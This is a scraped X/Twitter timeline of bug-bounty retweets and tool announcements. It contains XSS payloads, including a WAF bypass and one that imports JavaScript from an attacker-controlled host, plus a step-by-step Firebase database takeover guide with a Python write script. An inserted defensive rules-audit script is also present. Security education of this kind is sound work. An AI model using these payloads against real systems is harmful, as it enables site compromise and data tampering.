zzzZ
@WkendXu
172 posts
Joined July 2019
889 Following, 30 Followers
zzzZ retweeted
Quentin Texier 🦀@g0h4n_0·
Hi everyone 👋🦀 New repo for RustHound-CE, this version is only compatible with BloodHound-CE: github.com/g0h4n/RustHoun… Many thanks to @f3rn0s for code refactoring! And many thanks to NeverHack! I'll be handing over development of the project from today.
zzzZ retweeted
Erick Fernando@erickfernandox·
If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[]. Payload: <a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)> #Bugbounty #AkamaiBypass
zzzZ retweeted
Alex Neff@al3x_n3ff·
NetExec Version 1.3.0 has been released🔥
Biggest new features:
- New NFS protocol
- SCCM Enumeration
- Coercer_plus module
For the detailed release notes check out: github.com/Pennyw0rth/Net… Or our wiki as soon as a feature rundown is available.
Hack The Box@hackthebox_eu·
You gotta ADmit these tools are a must-have 💥 From #bloodhound to #ADExplorer, here's everything you need for your next enumeration session. How familiar are you with them? Learn how to pentest complex Active Directory infrastructures: okt.to/cE0wCq #HackTheBox #HTB
zzzZ retweeted
Raunak Parmar@trouble1_raunak·
[1/3] Found a Crazy XXE/SQL injection while hunting a random web application. 💉XXE Injection via Out-Of-Band-SQL Injection in Oracle Based Database 😈 Below 💊 payload allowed me to get the Hostname by using SYS_CONTEXT which is an in-built function in Oracle SQL.
zzzZ@WkendXu·
@chux13786509 /find?key=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E
chux@chux13786509·
Another day another bug 🔥 Just found this code in an open source web app (and changed a little bit before publishing). Can you spot the vulnerability? Write down your payload for exploiting it 🥷 Share for more interesting payloads in the comments 🤓 #bugbounty #Hacking
zzzZ retweeted
Intigriti@intigriti·
Here's a full guide and methodology for beginners on how to look for reflective XSS vulnerabilities! 🤑 A thread! 🧵 👇
zzzZ retweeted
𝕏 Bug Bounty Writeups 𝕏@bountywriteups·
Great Tip by @DhabaleshwarD ✌️💥

I came across a very interesting vulnerability that many people overlook during mobile penetration testing: "Misconfigured Firebase DB Takeover."

Firebase is a cloud-based NoSQL Database that stores and syncs data in real time among users. Sometimes, developers fail to configure it correctly according to best practices. This oversight can lead to misconfigurations. I've encountered and exploited numerous instances of these vulnerabilities in my pentesting experiences. Today, I'll explain how you can do it too. Let's dive into the steps to test it out.

PoC Steps:

1- First, decompile the apk file using apktool.
   apktool d example.apk

2- Go inside the decompiled folder and use the grep command to search for "firebaseio.com" keyword:
   grep -iR firebaseio
   (You'll find the firebase url if the application is using any. If you feel this step is complicated, then you can use MobSF and it will directly give you the firebase url. Also, note most of the time you'll find the firebase url in "res/values/strings.xml" file.)

3- Now, I found the firebase url, let's say: https://example-db .firebaseio .com/

4- The next step would be, to paste this URL in the browser along with a "/.json" at the end, which will look something like this: https://example-db.firebaseio .com/.json
   (Appending /.json at the end of a Firebase URL means that you're accessing data in JSON format from Firebase's Realtime Database.)

5- Now, let's take three scenarios:
   5.1- If you are able to access the information inside it, that would mean, the database info is public. Which is a High severity vulnerability you can directly report. (But I bet this isn't something you'll generally find)
   5.2- If you don't see any info, but simply "null", that means we can proceed with our attack.
   5.3- If you see "Permission Denied", that means, the database is properly configured and you can't perform the takeover attack.

6- We will focus on the second scenario, where you see a "null" option. It generally indicates that you have read access to the Firebase Realtime Database but there is no data stored at the root level.

7- Now, for performing the Takeover attack. I created a simple python script, to help me out. Save the code below to a ".py" file and execute it. [It will work only if write perm. is enabled]

   import requests

   url = "https://example-db. firebaseio.com/.json"
   data = {"Exploit": "Successfull", "DATABASE TAKEOVER BY": "Dhabal"}

   try:
       response = requests.put(url, json=data)
       print("Database takeover successful.") if response.status_code == 200 else print(f"Failed: {response.status_code}")
   except requests.RequestException as e:
       print(f"Error: {e}")

   (If you feel this is complicated, then you can use simple curl command to do the same thing, without the need for a python script)

8- After that, visit the url "https://example-db. firebaseio.com/.json" and you should see the data we added.

I hope you learnt something valuable today!

#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
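A defender-side check for the misconfiguration described in the post above, added here as an example and not part of the original post: it audits an exported Realtime Database rules file for ".read" and ".write" rules that are open to unauthenticated clients, which is the condition scenarios 5.1 and 7 depend on. The sample rules and the function names are constructed for illustration.

```python
import json

# Constructed sample rules: the root is world-writable, /public is
# world-readable, and /users/$uid is limited to the signed-in owner.
SAMPLE_RULES = json.loads("""
{
  "rules": {
    ".read": false,
    ".write": true,
    "public": {".read": "true"},
    "users": {
      "$uid": {
        ".read": "auth != null && auth.uid == $uid",
        ".write": "auth != null && auth.uid == $uid"
      }
    }
  }
}
""")

def is_unconditional(expr):
    """True when a rule grants access to everyone, signed in or not."""
    if isinstance(expr, bool):
        return expr
    return isinstance(expr, str) and expr.strip() == "true"

def audit_rules(rules_doc):
    """Return sorted (path, operation) pairs open to anonymous clients.

    Rules cascade: access granted at a parent cannot be revoked by a child,
    so each finding is reported once, at the highest path where access opens;
    everything below that path is exposed as well.
    """
    findings = []

    def walk(node, path, inherited):
        open_ops = set(inherited)
        for op in (".read", ".write"):
            if op not in open_ops and is_unconditional(node.get(op, False)):
                open_ops.add(op)
                findings.append((path or "/", op))
        for key, child in node.items():
            if not key.startswith(".") and isinstance(child, dict):
                walk(child, f"{path}/{key}", open_ops)

    walk(rules_doc.get("rules", {}), "", set())
    return sorted(findings)
```

An empty result means no path is open to anonymous clients, which corresponds to the "Permission Denied" response in scenario 5.3.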
zzzZ@WkendXu·
@hackviserr The volumes section is used to mount directories from the host system into the container. In this case, the root directory of the host system (/) is being mounted into the container at the /files directory.
zzzZ retweeted
Black Myth@BlackMythGame·
Destined One, come embark on this journey with us in our first ever exclusive campaign! Explore the mythology surrounding Sun Wukong and immerse yourselves in the rich world of mythology. Event 1: Submit videos for a chance to win a RTX 4070 Super Graphics Card, Official Merch, Collaboration Opportunity! Event 2: Follow us and retweet this post for a chance to win Official Merch! Note: 18+ only. No language/country restrictions. Ends on June 23. For more details: bit.ly/BlackMythWukon… #BlackMythWukong #Wukong #Monkeyking
zzzZ retweeted
TryHackMe@tryhackme·
📣 To celebrate three million of us, we’re giving away limited-edition t-shirts and annual subscriptions throughout our social channels. Like and retweet to be in with the chance of winning! 😉
bugoverflow@bugoverfl0w·
XSS tip to load external JS code:
<img src=x onerror=import('//your-server.com/xss-code')>
In some cases the server recognizes / and will break the code; use this one:
<img sRc=OnXSS OnError=import(atob('Ly95b3VyLXNlcnZlci5jb20v'))>
1/n #bugbountytips